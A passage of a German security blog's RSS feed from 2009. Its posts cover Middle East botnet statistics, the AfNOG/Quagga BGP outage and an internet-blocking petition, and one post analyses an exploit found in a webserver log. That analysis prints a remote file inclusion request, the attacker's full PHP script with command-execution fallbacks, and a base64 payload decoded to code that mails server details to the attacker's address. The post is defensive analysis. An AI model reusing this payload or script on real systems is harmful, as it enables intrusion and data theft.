<p>Auch wenn die meisten Angriffe gegen die EMEA Region, das heißt Europa, Nahost und Afrika, von den Vereinigten Staaten ausgehen, macht Dubai trotzdem noch einen großen Anteil aus. Im Jahr 2008 stiegen die Vereinigten arabischen Emirate von Platz 43 (2007) auf Platz 10 in den Angriffsstatistiken. Grund dafür ist möglicherweise der starke Anstieg der Breitbandanschlüsse in der Region mit einer Zunahmen von fast 900% seit dem Jahr 2005.</p>
<p>Im Bericht von Symantec wird auch deutlich das von der gesamten EMEA Region Saudi Arabien am schwersten von Infektionen mit Computerwürmern betroffen war. Zuvor war das Land noch auf Platz 13. Auch hier ist in jüngster Zeit ein massiver Ausbau der Breitbandversorgung vorangetrieben worden. Damit steigt der Nahe Osten von der einstmaligen Opferrolle malwaregesteuerte Angriffe in die Riege der Angreifer auf.</p>
<hr /><h2>Related posts:</h2><ul><li><a href="http://netzhappen.de/2009/01/14/spam-level-steigt-wieder/" rel="bookmark" title="Permanent Link: Spam-Level steigt wieder">Spam-Level steigt wieder</a></li><li><a href="http://netzhappen.de/2009/01/30/in-texas-warnen-verkehrsanzeigetafeln-vor-zombies/" rel="bookmark" title="Permanent Link: In Texas warnen Verkehrsanzeigetafeln vor Zombies">In Texas warnen Verkehrsanzeigetafeln vor Zombies</a></li><li><a href="http://netzhappen.de/2009/01/05/tiefseekabeldefekt-update/" rel="bookmark" title="Permanent Link: Tiefseekabeldefekt &#8211; Update">Tiefseekabeldefekt &#8211; Update</a></li><li><a href="http://netzhappen.de/2008/12/20/die-10-nennenswertesten-internetstorungen-2008/" rel="bookmark" title="Permanent Link: Die 10 nennenswertesten Internetstörungen 2008">Die 10 nennenswertesten Internetstörungen 2008</a></li><li><a href="http://netzhappen.de/2009/04/21/4-grunde-warum-es-immer-schwerer-wird-botnetze-zu-bekampfen/" rel="bookmark" title="Permanent Link: 4 Gründe warum es immer schwerer wird Botnetze zu bekämpfen">4 Gründe warum es immer schwerer wird Botnetze zu bekämpfen</a></li></ul><hr /><small>Copyright &copy; 2009 Creative Commons (by-sa 3.0 de)<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:  603cc2c207abcf396f861a9a7ec0ad7a)</small>
<p><a href="http://feedads.g.doubleclick.net/~a/hMPTPZu9aqWzhFfsT3-xqGSX6gA/0/da"><img src="http://feedads.g.doubleclick.net/~a/hMPTPZu9aqWzhFfsT3-xqGSX6gA/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/hMPTPZu9aqWzhFfsT3-xqGSX6gA/1/da"><img src="http://feedads.g.doubleclick.net/~a/hMPTPZu9aqWzhFfsT3-xqGSX6gA/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Netzhappen/~4/BGA0t0Q3m1Q" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://netzhappen.de/2009/05/15/dubai-hauptstadt-der-botnetze-in-nahost/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://netzhappen.de/2009/05/15/dubai-hauptstadt-der-botnetze-in-nahost/</feedburner:origLink></item>
		<item>
		<title>Freie Shell – Eine kleine Exploit Analyse</title>
		<link>http://feedproxy.google.com/~r/Netzhappen/~3/oOGSSTevqfM/</link>
		<comments>http://netzhappen.de/2009/05/08/freie-shell-eine-kleine-exploit-analyse/#comments</comments>
		<pubDate>Fri, 08 May 2009 09:48:01 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Netzsicherheit]]></category>
		<category><![CDATA[analyse]]></category>
		<category><![CDATA[base64]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[fr33sh3ll]]></category>
		<category><![CDATA[remote]]></category>

		<guid isPermaLink="false">http://netzhappen.de/?p=1561</guid>
		<description><![CDATA[Schaut man hin und wieder durch die Logdateien des Webservers sieht man allerlei merkwürdige und meist auch eindeutig verdächtigen HTTP-Requests. Oftmals wird einfach nur nach bestimmten Dateien von diversen Applikationen gesucht die in älteren Versionen verschiedenste Sicherheitslücken aufweisen. Ab und zu wird auch versucht entfernte PHP Scripte auszuführen, in der Hoffnung das der Webserver mit [...]]]></description>
			<content:encoded><![CDATA[<p>Schaut man hin und wieder durch die Logdateien des Webservers sieht man allerlei merkwürdige und meist auch eindeutig verdächtigen <a href="http://de.wikipedia.org/wiki/HTTP-Request#HTTP-Request-Methoden">HTTP-Requests</a>. Oftmals wird einfach nur nach bestimmten Dateien von diversen Applikationen gesucht die in älteren Versionen verschiedenste Sicherheitslücken aufweisen. Ab und zu wird auch versucht entfernte PHP Scripte auszuführen, in der Hoffnung das der Webserver mit den installierten Anwendungen fehlerhaft konfiguriert beziehungsweise nicht ausreichend abgesichert ist.</p>
<p>Heute hatte ich mir mal den Spaß gemacht einen solchen &#8220;Angriff&#8221; genauer anzuschauen. Dabei geht es im vorliegenden Fall im einen sehr einfachen Versuch, so daß jetzt hier keine wirklichen Überraschungen zum Vorschein kommen. Solche Versuche gibt es weltweit sicherlich im sechsstelligen Bereich pro Tag.</p>
<h3>Der HTTP-Request</h3>
<p>Eine typische Anfrage in dieser Hinsicht ist zum Beispiel die folgende:<br />
<span style="color: #993300;"><br />
207.182.137.218 &#8211; - [03/May/2009:22:57:48 +0200] &#8220;GET /?_SERVER[DOCUMENT_ROOT]=http://sito.blackdrag0n.net/Cartoon/idnew.txt? HTTP/1.1&#8243; 200 43066 &#8220;-&#8221; &#8220;libwww-perl/5.820&#8243;</span></p>
<p>Was sehen wir hier? Von der IP 207.182.137.218 wird versucht durch eine GET-Anfrage und Umschreiben der DOCUMENT_ROOT Variable die Datei idnew.txt zu lesen und unter den Rechten des Webservers auszuführen. Anhand der Angabe libwww-perl sieht man, dass die Anfrage durch eine <a href="http://de.wikipedia.org/wiki/Perl_%28Programmiersprache%29">Perl</a> Bibliothek erfolgt und nicht durch einen Browser, also scheint hier ein Script zu werkeln.</p>
<h3>Die idnew.txt und ihr Inhalt</h3>
<p>Der Inhalt der idnew.txt besteht aus <a href="http://de.wikipedia.org/wiki/PHP">PHP-Code</a>, der teils mit MIME <a href="http://de.wikipedia.org/wiki/Base64">base64</a> kodiert ist. Hier der PHP-Code aus der Datei:</p>
<p><span style="color: #993300;">&lt;?php<br />
//Coracore Response<br />
$pwd1 =    @getcwd();<br />
$un = @php_uname();<br />
$os = @PHP_OS;<br />
$id1 = ex(&#8221;id&#8221;);if (empty($id1)) {$id1 = @get_current_user();}<br />
$sof1 =    @getenv(&#8221;SERVER_SOFTWARE&#8221;);<br />
$php1 =    @phpversion();<br />
$name1 = $_SERVER['SERVER_NAME'];<br />
$ip1 = @gethostbyname($SERVER_ADDR);<br />
$free1=    @diskfreespace($pwd1);<br />
$all1= disk_total_space($pwd1);<br />
$used =    ConvertBytes($all1-$free1);<br />
$free =    ConvertBytes(@diskfreespace($pwd1));if (!$free) {$free = 0;}<br />
$all = ConvertBytes(@disk_total_space($pwd1));if (!$all) {$all = 0;}<br />
if (@is_writable($pwd1)) {$perm = &#8220;[W]&#8220;;} else {$perm = &#8220;[R]&#8220;;}<br />
if (@ini_get(&#8221;safe_mode&#8221;) or strtolower(@ini_get(&#8221;safe_mode&#8221;)) == &#8220;on&#8221;) {$sf = &#8220;ON&#8221;;} else {$sf = &#8220;OFF&#8221;;}</span></p>
<p><span style="color: #993300;">echo &#8220;Coracore&#8221;.$sf.&#8221;&lt;br&gt;&#8221;;<br />
echo &#8220;uname -a:    $un&lt;br&gt;&#8221;;<br />
echo &#8220;os: $os&lt;br&gt;&#8221;;<br />
echo &#8220;id: $id1&lt;br&gt;&#8221;;<br />
echo &#8220;pwd: $pwd1&lt;br&gt;&#8221;;<br />
echo &#8220;php: $php1&lt;br&gt;&#8221;;<br />
echo &#8220;software:    $sof1&lt;br&gt;&#8221;;<br />
echo &#8220;srvip: $ip1&lt;br&gt;&#8221;;<br />
echo &#8220;srvname: $name1&lt;br&gt;&#8221;;<br />
echo &#8220;free: $free&lt;br&gt;&#8221;;<br />
echo &#8220;used: $used&lt;br&gt;&#8221;;<br />
echo &#8220;total: $all $perm&lt;br&gt;&#8221;;</span></p>
<p><span style="color: #993300;">function ConvertBytes($number) {<br />
$len = strlen($number);<br />
if($len &lt; 4) { return sprintf(&#8221;%d b&#8221;, $number); }<br />
if($len &gt;= 4 &amp;&amp; $len &lt;=6) { return sprintf(&#8221;%0.2f Kb&#8221;, $number/1024); }<br />
if($len &gt;= 7 &amp;&amp; $len &lt;=9) { return sprintf(&#8221;%0.2f Mb&#8221;, $number/1024/1024); }<br />
return sprintf(&#8221;%0.2f Gb&#8221;, $number/1024/1024/1024);<br />
}</span></p>
<p><span style="color: #993300;">function ex($cfe) {<br />
$res = &#8221;;<br />
if (!empty($cfe)) {<br />
if(function_exists(&#8217;exec&#8217;)) {<br />
@exec($cfe,$res);<br />
$res = join(&#8221;\n&#8221;,$res);<br />
} elseif(function_exists(&#8217;shell_exec&#8217;)) {<br />
$res = @shell_exec($cfe);<br />
} elseif(function_exists(&#8217;system&#8217;)) {<br />
@ob_start();<br />
@system($cfe);<br />
$res = @ob_get_contents();<br />
@ob_end_clean();<br />
} elseif(function_exists(&#8217;passthru&#8217;)) {<br />
@ob_start();<br />
@passthru($cfe);<br />
$res = @ob_get_contents();<br />
@ob_end_clean();<br />
} elseif(@is_resource($f = @popen($cfe,&#8221;r&#8221;))) {<br />
$res = &#8220;&#8221;;<br />
while(!@feof($f)) { $res .= @fread($f,1024); }<br />
@pclose($f);<br />
} else { $res = &#8220;NULL&#8221;; }<br />
}<br />
return $res;<br />
}</span></p>
<p><span style="color: #993300;">?&gt;</span></p>
<p><span style="color: #993300;">&lt;?php<br />
$lmge = &#8220;JGNyZWF0b3I9YmFzZTY0X2RlY29kZSgiWm5Jek0zTm9NM<br />
nhzUUdkdFlXbHNMbU52YlE9PSIpOw0KKCRzYWZlX21vZG<br />
UpPygkc2FmZXo9Ik9OIik6KCRzYWZlej0iT0ZGX0hFSEUiKT<br />
sNCiRiYXNlPSJodHRwOi8vIi4kX1NFUlZFUlsnSFRUUF9IT1<br />
NUJ10uJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ107IA0KJG5h<br />
bWUgPSBwaHBfdW5hbWUoKTsgJGlwID0gZ2V0ZW52KCJS<br />
RU1PVEVfQUREUiIpOyAkaXAyID0gZ2V0aG9zdGJ5YWRkcig<br />
kX1NFUlZFUltSRU1PVEVfQUREUl0pOyAkc3ViaiA9ICRfU0V<br />
SVkVSWydIVFRQX0hPU1QnXTsgDQokbXNnID0gIlxuQkFTR<br />
TogJGJhc2VcbnVuYW1lIGE6ICRuYW1lXG5CeXBhc3M6ICRieX<br />
Bhc3NlclxuSVA6ICRpcFxuSG9zdDogJGlwMiAkcHdkcyI7DQok<br />
ZnJvbSA9IkZyb206ICIuJHdyaXQuIl9fXz0iLiRzYWZlei4iPHRvb<br />
2xAIi4kX1NFUlZFUlsnSFRUUF9IT1NUJ10uIj4iOw0KbWFpbC<br />
ggJGNyZWF0b3IsICRzdWJqLCAkbXNnLCAkZnJvbSk7&#8243;; eval(base64_decode($lmge));<br />
exit;<br />
?&gt;</span></p>
<p>Wie man sieht versucht das Script zuerst einige Daten über das System zu sammeln. Dazu gehören Betriebssytem, Benutzer-ID, Speicherplatz, IP des Servers, PHP-Version, Server-Software und ob man Systemzugriff hat.</p>
<h3>Kodierter Code und der Urheber</h3>
<p>Interessant ist aber vor allem der letzte Teil des Scripts. Zu sehen ist eine Zeichenfolge die mit MIME base64 kodiert ist und ausgeführt wird. Dekodiert man diesen String erhält man folgenden Klartext-Code:</p>
<p><span style="color: #993300;">$creator=base64_decode(&#8221;ZnIzM3NoM2xsQGdtYWlsLmNvbQ==&#8221;);<br />
($safe_mode)?($safez=&#8221;ON&#8221;):($safez=&#8221;OFF_HEHE&#8221;);<br />
$base=&#8221;http://&#8221;.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];<br />
$name = php_uname(); $ip = getenv(&#8221;REMOTE_ADDR&#8221;); $ip2 = gethostbyaddr($_SERVER[REMOTE_ADDR]); $subj = $_SERVER['HTTP_HOST'];<br />
$msg = &#8220;\nBASE: $base\nuname a: $name\nBypass: $bypasser\nIP: $ip\nHost: $ip2 $pwds&#8221;;<br />
$from =&#8221;From: &#8220;.$writ.&#8221;___=&#8221;.$safez.&#8221;&lt;tool@&#8221;.$_SERVER['HTTP_HOST'].&#8221;&gt;&#8221;;<br />
mail( $creator, $subj, $msg, $from);</span></p>
<p>Hier sieht man das eine Email mit IP, Hostname usw. an eine Email geschickt werden soll. Hierdurch erhält der Angreifer bei erfolgreichen Scriptausführung eine Benachrichtigungsemail mit Daten zum Server und der URL die für diesen Exploit anfällig ist. Die Empfänger-Email ist noch einmal mit base64 kodiert:</p>
<p><span style="color: #993300;">$creator=base64_decode(&#8221;ZnIzM3NoM2xsQGdtYWlsLmNvbQ==&#8221;);</span></p>
<p>Nach Dekodierung ist diese nun lesbar und führt zu dem Gmail-Account: <span style="color: #993300;">fr33sh3ll@gmail.com</span><br />
Ich habe Google hierzu einfahc mal informiert und warte mal ob eine Antwort kommt oder ob dieser Account nicht schon längst abgestellt wurde.</p>
<hr /><h2>Related posts:</h2><ul><li><a href="http://netzhappen.de/datenschutzerklarung/" rel="bookmark" title="Permanent Link: Datenschutzerklärung">Datenschutzerklärung</a></li><li><a href="http://netzhappen.de/2009/01/30/90-aller-emails-weltweit-sind-spam/" rel="bookmark" title="Permanent Link: 90% aller Emails weltweit sind Spam">90% aller Emails weltweit sind Spam</a></li><li><a href="http://netzhappen.de/2009/01/29/ddos-lahmt-kirgistan-teil-2/" rel="bookmark" title="Permanent Link: DDoS lähmt Kirgistan &#8211; Teil 2">DDoS lähmt Kirgistan &#8211; Teil 2</a></li><li><a href="http://netzhappen.de/2009/02/09/google-analytics-ade/" rel="bookmark" title="Permanent Link: Google Analytics adé">Google Analytics adé</a></li><li><a href="http://netzhappen.de/2008/11/18/norwegens-regierung-setzt-sich-fur-open-office-ein/" rel="bookmark" title="Permanent Link: Norwegens Regierung setzt sich für Open-Office ein">Norwegens Regierung setzt sich für Open-Office ein</a></li></ul><hr /><small>Copyright &copy; 2009 Creative Commons (by-sa 3.0 de)<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:  603cc2c207abcf396f861a9a7ec0ad7a)</small>
<p><a href="http://feedads.g.doubleclick.net/~a/xTjrFiLeL5UcF1oyurkRX6BbWlM/0/da"><img src="http://feedads.g.doubleclick.net/~a/xTjrFiLeL5UcF1oyurkRX6BbWlM/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/xTjrFiLeL5UcF1oyurkRX6BbWlM/1/da"><img src="http://feedads.g.doubleclick.net/~a/xTjrFiLeL5UcF1oyurkRX6BbWlM/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Netzhappen/~4/oOGSSTevqfM" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://netzhappen.de/2009/05/08/freie-shell-eine-kleine-exploit-analyse/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://netzhappen.de/2009/05/08/freie-shell-eine-kleine-exploit-analyse/</feedburner:origLink></item>
		<item>
		<title>AfNOG sorgt weltweit für Internetausfälle</title>
		<link>http://feedproxy.google.com/~r/Netzhappen/~3/nT6AWFAcBoI/</link>
		<comments>http://netzhappen.de/2009/05/06/afnog-sorgt-weltweit-fur-internetausfalle/#comments</comments>
		<pubDate>Wed, 06 May 2009 08:59:46 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Netzsicherheit]]></category>
		<category><![CDATA[afnog]]></category>
		<category><![CDATA[ausfall]]></category>
		<category><![CDATA[buffer overflow]]></category>
		<category><![CDATA[quagga]]></category>
		<category><![CDATA[router]]></category>
		<category><![CDATA[routing]]></category>

		<guid isPermaLink="false">http://netzhappen.de/?p=1555</guid>
		<description><![CDATA[Im Februar sorgte ein kleiner tschechischer Provider durch eine falsche Konfiguration der Routinginformationen weltweit für Ausfälle von Teilen des Internets. Grund war damals ein Fehler in der Routersoftware von Cisco, der die ungültigen Signale nicht korrekt verarbeiten konnte. Am 3. Mai kam es nun wiederum zu einem ähnlichen Vorfall der weltweit für einen Zeitraum von [...]]]></description>
			<content:encoded><![CDATA[<p>Im Februar sorgte ein kleiner tschechischer Provider durch eine falsche Konfiguration der <a href="http://de.wikipedia.org/wiki/Routing">Routinginformationen</a> weltweit für <a href="http://netzhappen.de/2009/02/17/router-in-tschechien-sorgt-weltweit-fur-internetausfalle/">Ausfälle von Teilen des Internets</a>. Grund war damals ein Fehler in der Routersoftware von Cisco, der die ungültigen Signale nicht korrekt verarbeiten konnte. Am 3. Mai kam es nun wiederum zu einem ähnlichen Vorfall der weltweit für einen Zeitraum von rund 6 Stunden tausende Netzwerke lahmlegte.</p>
<h3>Was war geschehen?</h3>
<p>Am Sonntag, den 3.Mai, konnte ein plötzlicher und andauernder Anstieg von Routingupdates und ihnen folgenden Internetausfällen beobachtet werden. Normalerweise kann man daraufhin feststellen das die Ausfälle von Land X ausgehen und durch Aktivitäten des Provider Y verursacht werden. Dieses Mal aber waren die Ausfälle überall zu beobachten. Es wurden Probleme und Instabilitäten in Indonesien, Bulgarien, Deutschland, Rumänien, Brasilien, Russland, USA und vielen anderen Ländern gemeldet. Aufgrund dieser globalen Verteilung sah es wieder nach einem ähnlichen Vorfall wie im Februar aus. Und dies war dann auch der Fall.</p>
<h3>Technische Vorbetrachtung</h3>
<p>Um das Problem vom 3. Mai zu verstehen bedarf es zuerst einiger Vorüberlegungen. Jede Organisation die für Internetrouting mitverantwortlich ist, kontrolliert zwei Dinge. Zum einen Blöcke von IP Adressen (Prefixe) und eine Identifikationsnummer, <a href="http://de.wikipedia.org/wiki/Autonomes_System">Autonome System Number</a> (ASN) genannt. Wie auch bei <a href="http://de.wikipedia.org/wiki/IPv4">IPv4</a> ist die Zahl der ASNs begrenzt und die Zahl noch verfügbarer ASNs wird langsam aber stetig knapp. Designtechnisch sind 2 Bytes für eine ASN vorgesehen, was einer Anzahl von 65.536 entspricht. Aktuell ist man nun bei ASN 49.232 angekommen. ASNs ab 64.512 sind reserviert, so dass noch circa 15.000 2-Byte ASNs verfügbar sind. Durch diese Limitierung wird es nicht mehr allzu lange dauern bis auch diese letzten ASNs belegt sind. Aufgrund dessen hat man eine Alternative vorgesehen, nämlich 4-Byte ASNs. Seit 2009 werden diese von <a href="http://de.wikipedia.org/wiki/RIPE">RIPE</a> standardmäßig vergeben. Praktischerweise können diese 4-Byte ASNs problemlos neben den 2-Byte ASN koexistieren.</p>
<h3>Zurück zum 3. Mai</h3>
<p>Wie geschrieben, sollten 4-Byte ASNs somit problemlos funktionieren und könnten somit auch völlig normal über Router verbreitet werden. Und so dachte sich die Afrikanische Netzwerk Operatoren Gruppe (<a href="http://www.afnog.org/">AfNOG</a>) nichts dabei bei ihrem kommenden Treffen in Kairo, Agypten solche 4-Byte ASNs für das Netzwerk zu nutzen. Sie besorgten sich die 4-Byte ASN 327686 und teilten mit:</p>
<blockquote><p>Eines der Ziele dieses Setups ist zu demonstrieren das 32-Bit ASN funktionieren und die Leute sich davor nicht scheuen brauchen, zumal die Zahl der 16-Bit ASNs schnell schrumpft. Ein Vorzeigenetzwerk soll dies zeigen.</p></blockquote>
<p>Die AfNOG hat einen IPv4 Prefix, namentlich 196.200.208.0/20 und eine der &#8220;alten&#8221; 2-Byte ASN &#8211; 37095. Am 30. April gegen 17:21 UTC konnte nun beobachtet werden das diese 2-Byte ASN obigen Prefix verbreitete:</p>
<p><span style="color: #993300;">* 24863 37095 37095 37095 37095 37095 37095 37095 37095 37095 37095 37095</span></p>
<p>ASN 24863 gehört zu LINKdotNET, einen lokalen ägyptischen Provider. Bis davin zeigte der ASN Pfad also nichts ungewöhnliches. Dann aber am 3. Mai um 12:00 UTC wurde obiger Pfad durch 4-Byte ASNs ersetzt:</p>
<p><span style="color: #993300;">* 24863 327686 327686 327686 327686 327686 327686 327686 327686 327686 327686 37095</span></p>
<p>Sofort wurden daraufhin global Probleme gemeldet und Ausfälle weltweit waren zu verzeichnen.</p>
<div id="attachment_1556" class="wp-caption aligncenter" style="width: 310px"><a href="http://netzhappen.de/wp-content/uploads/2009/05/quagga1.jpg"><img class="size-medium wp-image-1556" title="Internetausfälle 3. Mai © Renesys" src="http://netzhappen.de/wp-content/uploads/2009/05/quagga1-300x173.jpg" alt="Internetausfälle 3. Mai © Renesys" width="300" height="173" /></a><p class="wp-caption-text">Internetausfälle 3. Mai © Renesys</p></div>
<h3>Warum kam es zu Ausfällen?</h3>
<p>Weltweit werden verschiedenste Router eingesetzt. Von teuren Cisco oder Juniper Routern bis hin zu günstigen linuxgesteuerten Rechern mit der freien Routing-Software <a href="http://www.quagga.net/">Quagga</a>. Und da liegt das Problem. Ältere Versionen von Quagga haben ein <a href="http://de.wikipedia.org/wiki/Puffer%C3%BCberlauf">Buffer Overflow</a> Bug, der die <a href="http://de.wikipedia.org/wiki/BGP">BGP</a> Session verwarf, sobald die Routing-Ankündigung mit dem 4-Byte Pfad ankam. Die Software von Quagga belegt nur eine begrenzte Anzahl von Zeichen für ASNs und sobald jemand mehrere 4-Byte ASN aneinanderhängt, wie im vorliegenden Fall, ist der Puffer erreicht und läuft über. Die aktuellste Quagga Version 0.99.11 vom Oktober 2008 behandelt das Problem besser behandelt und störungsfrei.</p>
<p>Nachfolgende Grafik zeigt die Verteilung der Länder in denen mindestens 10 Netzwerke aufgrund dieses Bugs betroffen waren.</p>
<div id="attachment_1557" class="wp-caption aligncenter" style="width: 310px"><a href="http://netzhappen.de/wp-content/uploads/2009/05/quagga2.jpg"><img class="size-medium wp-image-1557" title="Länderverteilung der Ausfälle © Renesys" src="http://netzhappen.de/wp-content/uploads/2009/05/quagga2-300x174.jpg" alt="Länderverteilung der Ausfälle © Renesys" width="300" height="174" /></a><p class="wp-caption-text">Länderverteilung der Ausfälle © Renesys</p></div>
<h3>Links</h3>
<p><a href="http://www.renesys.com/blog/2009/05/byte-me.shtml">AfNOG Takes Byte Out of Internet</a> (renesys)<br />
<a href="http://www.afnog.org/">AfNOG</a> (Webseite)</p>
<hr /><h2>Related posts:</h2><ul><li><a href="http://netzhappen.de/2009/02/17/router-in-tschechien-sorgt-weltweit-fur-internetausfalle/" rel="bookmark" title="Permanent Link: Router in Tschechien sorgt weltweit für Internetausfälle">Router in Tschechien sorgt weltweit für Internetausfälle</a></li><li><a href="http://netzhappen.de/2009/02/02/anzahl-der-ssl-zertifikate-weltweit-ubersteigt-1-million/" rel="bookmark" title="Permanent Link: Anzahl der SSL-Zertifikate weltweit übersteigt 1 Million">Anzahl der SSL-Zertifikate weltweit übersteigt 1 Million</a></li><li><a href="http://netzhappen.de/2009/04/08/ddos-angriffe-auf-mehrere-webhoster/" rel="bookmark" title="Permanent Link: DDoS Angriffe auf mehrere Webhoster und DNS Provider">DDoS Angriffe auf mehrere Webhoster und DNS Provider</a></li><li><a href="http://netzhappen.de/2009/02/09/einblicke-in-die-arbeitsumgebung-eines-google-rechenzentrums/" rel="bookmark" title="Permanent Link: Einblicke in die Arbeitsumgebung eines Google Rechenzentrums">Einblicke in die Arbeitsumgebung eines Google Rechenzentrums</a></li><li><a href="http://netzhappen.de/2009/02/24/chinas-qzone-groser-als-facebook/" rel="bookmark" title="Permanent Link: China&#8217;s Qzone größer als Facebook?">China&#8217;s Qzone größer als Facebook?</a></li></ul><hr /><small>Copyright &copy; 2009 Creative Commons (by-sa 3.0 de)<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:  603cc2c207abcf396f861a9a7ec0ad7a)</small>
<p><a href="http://feedads.g.doubleclick.net/~a/d7cqpXDAs3VGc6KsAHruFlYqbzE/0/da"><img src="http://feedads.g.doubleclick.net/~a/d7cqpXDAs3VGc6KsAHruFlYqbzE/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/d7cqpXDAs3VGc6KsAHruFlYqbzE/1/da"><img src="http://feedads.g.doubleclick.net/~a/d7cqpXDAs3VGc6KsAHruFlYqbzE/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Netzhappen/~4/nT6AWFAcBoI" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://netzhappen.de/2009/05/06/afnog-sorgt-weltweit-fur-internetausfalle/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://netzhappen.de/2009/05/06/afnog-sorgt-weltweit-fur-internetausfalle/</feedburner:origLink></item>
		<item>
		<title>Petition gegen Internetsperren</title>
		<link>http://feedproxy.google.com/~r/Netzhappen/~3/u3X2aW5GCOI/</link>
		<comments>http://netzhappen.de/2009/05/05/petition-gegen-internetsperren/#comments</comments>
		<pubDate>Tue, 05 May 2009 09:44:30 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[1984]]></category>
		<category><![CDATA[Netzpolitik]]></category>
		<category><![CDATA[indizierung]]></category>
		<category><![CDATA[internet]]></category>
		<category><![CDATA[netzsperre]]></category>
		<category><![CDATA[petition]]></category>
		<category><![CDATA[zensur]]></category>

		<guid isPermaLink="false">http://netzhappen.de/?p=1552</guid>
		<description><![CDATA[Die meisten werden es inzwischen in der Blogosphäre gelesen haben. Es gibt eine Online Petition gegen Internetsperren:
 Petition: Internet &#8211; Keine Indizierung und Sperrung von  Internetseiten
Wir fordern, daß der Deutsche Bundestag die Änderung des  Telemediengesetzes nach dem Gesetzentwurf des Bundeskabinetts vom  22.4.09 ablehnt. Wir halten das geplante Vorgehen, Internetseiten vom  BKA [...]]]></description>
			<content:encoded><![CDATA[<p>Die meisten werden es inzwischen in der Blogosphäre gelesen haben. Es gibt eine Online Petition gegen Internetsperren:<br />
<a href="https://epetitionen.bundestag.de/index.php?action=petition;sa=details;petition=3860"> Petition: Internet &#8211; Keine Indizierung und Sperrung von  Internetseiten</a></p>
<blockquote><p>Wir fordern, daß der Deutsche Bundestag die Änderung des  Telemediengesetzes nach dem Gesetzentwurf des Bundeskabinetts vom  22.4.09 ablehnt. Wir halten das geplante Vorgehen, Internetseiten vom  BKA indizieren &amp; von den Providern sperren zu lassen, für  undurchsichtig &amp; unkontrollierbar, da die &#8220;Sperrlisten&#8221; weder  einsehbar sind noch genau festgelegt ist, nach welchen Kriterien  Webseiten auf die Liste gesetzt werden. Wir sehen darin eine Gefährdung  des Grundrechtes auf Informationsfreiheit.</p></blockquote>
<p>Seit  die Petition gestern richtig bekannt wurde, reisst der Strom der Unterzeichner nicht ab und inzwischen gibt es rund 17.000 Mitzeichner. Damit die Petition im Kabinettsausschuss zum tragen kommt und der Inititator Rederecht erhält, bedarf es insgesamt 50.000 Stimmen.</p>
<hr /><h2>Related posts:</h2><ul><li><a href="http://netzhappen.de/2009/02/16/cdu-wer-internetsperren-verhindert-unterstutzt-kinderpornographie/" rel="bookmark" title="Permanent Link: CDU: Wer Internetsperren verhindert, unterstützt Kinderpornographie">CDU: Wer Internetsperren verhindert, unterstützt Kinderpornographie</a></li><li><a href="http://netzhappen.de/2009/04/20/ddos-angriff-gegen-weltverband-der-musikindustrie/" rel="bookmark" title="Permanent Link: DDoS Angriff gegen Weltverband der Musikindustrie">DDoS Angriff gegen Weltverband der Musikindustrie</a></li><li><a href="http://netzhappen.de/2009/02/03/ak-vorrat-startet-kampagne-gegen-verdachtlose-aufzeichnung-von-surfdaten/" rel="bookmark" title="Permanent Link: AK Vorrat startet Kampagne gegen verdachtlose Aufzeichnung von Surfdaten">AK Vorrat startet Kampagne gegen verdachtlose Aufzeichnung von Surfdaten</a></li><li><a href="http://netzhappen.de/2008/11/20/linkverbot-gegen-heise-bestatigt/" rel="bookmark" title="Permanent Link: Linkverbot gegen Heise bestätigt">Linkverbot gegen Heise bestätigt</a></li><li><a href="http://netzhappen.de/2009/04/09/franzosisches-three-strikes-gesetz-vom-tisch/" rel="bookmark" title="Permanent Link: Französisches Three-Strikes Gesetz vom Tisch?">Französisches Three-Strikes Gesetz vom Tisch?</a></li></ul><hr /><small>Copyright &copy; 2009 Creative Commons (by-sa 3.0 de)<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:  603cc2c207abcf396f861a9a7ec0ad7a)</small>
<p><a href="http://feedads.g.doubleclick.net/~a/DQJ_KC9O4mQNusCYLwrfnYuJTXs/0/da"><img src="http://feedads.g.doubleclick.net/~a/DQJ_KC9O4mQNusCYLwrfnYuJTXs/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/DQJ_KC9O4mQNusCYLwrfnYuJTXs/1/da"><img src="http://feedads.g.doubleclick.net/~a/DQJ_KC9O4mQNusCYLwrfnYuJTXs/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Netzhappen/~4/u3X2aW5GCOI" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://netzhappen.de/2009/05/05/petition-gegen-internetsperren/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://netzhappen.de/2009/05/05/petition-gegen-internetsperren/</feedburner:origLink></item>
		<item>
		<title>Nur 6% der deutschen Top100 Blogs liefern gültiges (X)HTML</title>
